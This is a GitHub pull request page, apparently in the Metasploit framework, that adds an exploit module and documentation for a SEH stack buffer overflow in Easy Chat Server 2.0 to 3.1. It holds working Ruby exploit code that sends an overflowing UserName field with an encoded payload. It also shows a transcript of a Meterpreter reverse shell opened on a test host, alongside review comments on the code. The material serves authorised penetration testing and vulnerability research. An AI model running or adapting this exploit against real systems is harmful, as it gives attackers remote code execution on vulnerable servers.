-
Notifications
You must be signed in to change notification settings - Fork 13.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit #8586
Merged
Merged
Changes from all commits
Commits
Show all changes
5 commits
Select commit
Hold shift + click to select a range
bc826cb
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit
Mzack9999 0b04dc0
Correct EDB Number
Mzack9999 af4eb0f
Corrected shellcode
Mzack9999 a886525
Added exploit documentation
Mzack9999 66eb89e
Exploit now uses HTTP mixin
Mzack9999 File filter
Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
## Description | ||
|
||
This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability. | ||
|
||
This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application | ||
|
||
## Vulnerable Application | ||
|
||
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software. | ||
|
||
This module has been tested successfully on | ||
|
||
* Easy Chat Server 3.1 on Windows XP En SP3 | ||
|
||
Installers: | ||
|
||
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe) | ||
|
||
## Verification Steps | ||
|
||
1. Start `msfconsole` | ||
2. Do: `use exploits/windows/http/easychatserver_seh` | ||
3. Do: `set rhosts [IP]` | ||
4. Do: `exploit` | ||
5. You should get your payload executed | ||
|
||
## Scenarios | ||
|
||
``` | ||
marco@kali:~$ msfconsole -q | ||
msf > use exploit/windows/http/easychatserver_seh | ||
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101 | ||
RHOST => 192.168.56.101 | ||
msf exploit(easychatserver_seh) > exploit | ||
|
||
[*] Started reverse TCP handler on 192.168.56.1:4444 | ||
[*] Sending stage (957487 bytes) to 192.168.56.101 | ||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200 | ||
|
||
meterpreter > sysinfo | ||
Computer : MM-8B040C5B05D9 | ||
OS : Windows XP (Build 2600, Service Pack 3). | ||
Architecture : x86 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x86/windows | ||
meterpreter > exit | ||
[*] Shutting down Meterpreter... | ||
|
||
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit | ||
msf exploit(easychatserver_seh) > | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,74 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
|
||
Rank = NormalRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)', | ||
'Description' => %q{ | ||
This module exploits a buffer overflow during user registration in Easy Chat Server software. | ||
}, | ||
'Author' => | ||
[ | ||
'Marco Rivoli', #Metasploit | ||
'Aitezaz Mohsin' #POC | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'EDB', '42155' ], | ||
], | ||
'Privileged' => true, | ||
'Payload' => | ||
{ | ||
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", | ||
}, | ||
'Platform' => 'win', | ||
'Targets' => | ||
[ | ||
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ], | ||
], | ||
'DefaultOptions' => { | ||
'RPORT' => 80, | ||
'EXITFUNC' => 'thread', | ||
'ENCODER' => 'x86/alpha_mixed' | ||
}, | ||
'DisclosureDate' => 'Oct 09 2017', | ||
'DefaultTarget' => 0)) | ||
end | ||
|
||
def exploit | ||
sploit = rand_text_alpha_upper(217) | ||
sploit << "\xeb\x06\x90\x90" | ||
sploit << [target.ret].pack('V') | ||
sploit << payload.encoded | ||
sploit << rand_text_alpha_upper(200) | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(URI,'registresult.htm'), | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This should be |
||
'method' => 'POST', | ||
'vars_post' => { | ||
'UserName' => sploit, | ||
'Password' => 'test', | ||
'Password1' => 'test', | ||
'Sex' => 1, | ||
'Email' => 'x@', | ||
'Icon' => 'x.gif', | ||
'Resume' => 'xxxx', | ||
'cw' => 1, | ||
'RoomID' => 4, | ||
'RepUserName' => 'admin', | ||
'submit1' => 'Register' | ||
} | ||
}) | ||
handler | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This is redundant. |
||
|
||
end | ||
end |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I think you want to register
TARGETURI
.